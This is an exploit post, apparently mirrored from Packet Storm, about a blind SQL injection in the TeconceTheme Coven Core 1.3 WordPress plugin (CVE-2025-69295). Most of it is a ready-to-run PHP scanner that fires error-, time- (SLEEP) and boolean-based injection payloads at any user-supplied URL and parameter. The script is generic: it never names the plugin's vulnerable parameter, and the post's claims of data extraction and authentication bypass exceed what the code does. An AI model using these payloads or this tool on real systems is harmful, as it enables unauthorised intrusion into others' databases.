Share
## https://sploitus.com/exploit?id=PACKETSTORM:216239
=============================================================================================================================================
| # Title : TeconceTheme Coven Core 1.3 Blind SQL Injection php Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://themeforest.net/user/teconcetheme |
=============================================================================================================================================
[+] Summary : A Blind SQL Injection vulnerability exists in TeconceTheme Coven Core due to improper sanitization of user-supplied input in a GET parameter.
The vulnerability allows remote attackers to manipulate backend SQL queries via crafted payloads. Depending on server configuration and database behavior, this issue may be exploited using:
Error-based SQL Injection
Time-based Blind SQL Injection
Boolean-based Blind SQL Injection
Successful exploitation could allow attackers to:
Extract sensitive database information
Enumerate database structure
Bypass authentication mechanisms
Potentially escalate to full database compromise
The vulnerability is remotely exploitable without authentication if the affected parameter is publicly accessible.
[+] POC :
<?php
error_reporting(0);
set_time_limit(0);
function banner() {
echo "\n";
echo "========================================================\n";
echo " CVE-2025-69295 Blind SQLi Scanner (PHP) by indoushka\n";
echo "=========================================================\n\n";
}
function http_request($url, $timeout = 5) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0");
$response = curl_exec($ch);
$error = curl_error($ch);
curl_close($ch);
if ($error) {
return false;
}
return $response;
}
function connect_target($target, $timeout) {
$urls = [];
if (strpos($target, "http") === 0) {
$urls[] = $target;
} else {
$urls[] = "https://" . $target;
$urls[] = "http://" . $target;
}
foreach ($urls as $url) {
echo "[+] Trying: $url\n";
$response = http_request($url, $timeout);
if ($response !== false) {
echo "[] Connected: $url\n";
return $url;
}
}
return false;
}
$ERROR_PAYLOADS = ["'", "\"", "'--", "' OR '1'='1"];
$TIME_PAYLOAD = "' OR SLEEP(5)-- ";
$BOOLEAN_TRUE = "' OR 1=1-- ";
$BOOLEAN_FALSE = "' OR 1=2-- ";
function error_based_test($url, $param, $timeout, $payloads) {
$errors = ["sql syntax", "mysql", "warning", "database error", "sql error"];
foreach ($payloads as $payload) {
$test_url = $url . "?" . $param . "=" . urlencode($payload);
$response = http_request($test_url, $timeout);
if ($response) {
foreach ($errors as $error) {
if (stripos($response, $error) !== false) {
return true;
}
}
}
}
return false;
}
function time_based_test($url, $param, $timeout, $payload) {
$test_url = $url . "?" . $param . "=" . urlencode($payload);
$start = microtime(true);
http_request($test_url, $timeout + 6);
$end = microtime(true);
if (($end - $start) >= 5) {
return true;
}
return false;
}
function boolean_based_test($url, $param, $timeout, $true_payload, $false_payload) {
$true_url = $url . "?" . $param . "=" . urlencode($true_payload);
$false_url = $url . "?" . $param . "=" . urlencode($false_payload);
$r1 = http_request($true_url, $timeout);
$r2 = http_request($false_url, $timeout);
if ($r1 && $r2) {
if (strlen($r1) != strlen($r2)) {
return true;
}
}
return false;
}
function scan($target, $param, $timeout) {
global $ERROR_PAYLOADS, $TIME_PAYLOAD, $BOOLEAN_TRUE, $BOOLEAN_FALSE;
$base_url = connect_target($target, $timeout);
if (!$base_url) {
echo "[!] Target unreachable\n";
return;
}
$vulnerable = false;
echo "\n[*] Testing Error-based SQLi...\n";
if (error_based_test($base_url, $param, $timeout, $ERROR_PAYLOADS)) {
echo "[] Error-based SQL Injection detected\n";
$vulnerable = true;
} else {
echo "[] No Error-based SQL Injection\n";
}
echo "\n[*] Testing Time-based SQLi...\n";
if (time_based_test($base_url, $param, $timeout, $TIME_PAYLOAD)) {
echo "[] Time-based SQL Injection detected\n";
$vulnerable = true;
} else {
echo "[] No Time-based SQL Injection\n";
}
echo "\n[*] Testing Boolean-based SQLi...\n";
if (boolean_based_test($base_url, $param, $timeout, $BOOLEAN_TRUE, $BOOLEAN_FALSE)) {
echo "[] Boolean-based SQL Injection detected\n";
$vulnerable = true;
} else {
echo "[] No Boolean-based SQL Injection\n";
}
echo "\n=====================================\n";
if ($vulnerable) {
echo "[!!!] RESULT: TARGET IS VULNERABLE TO CVE-2025-69295\n";
} else {
echo "[] RESULT: TARGET NOT VULNERABLE\n";
}
echo "=====================================\n";
}
banner();
$options = getopt("t:p:", ["target:", "param:", "timeout:"]);
$target = $options['t'] ?? $options['target'] ?? null;
$param = $options['p'] ?? $options['param'] ?? null;
$timeout = $options['timeout'] ?? 5;
if (!$target || !$param) {
echo "Usage:\n";
echo "php scanner.php -t http://target.com/page.php -p id --timeout=5\n";
exit;
}
scan($target, $param, $timeout);
?>
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================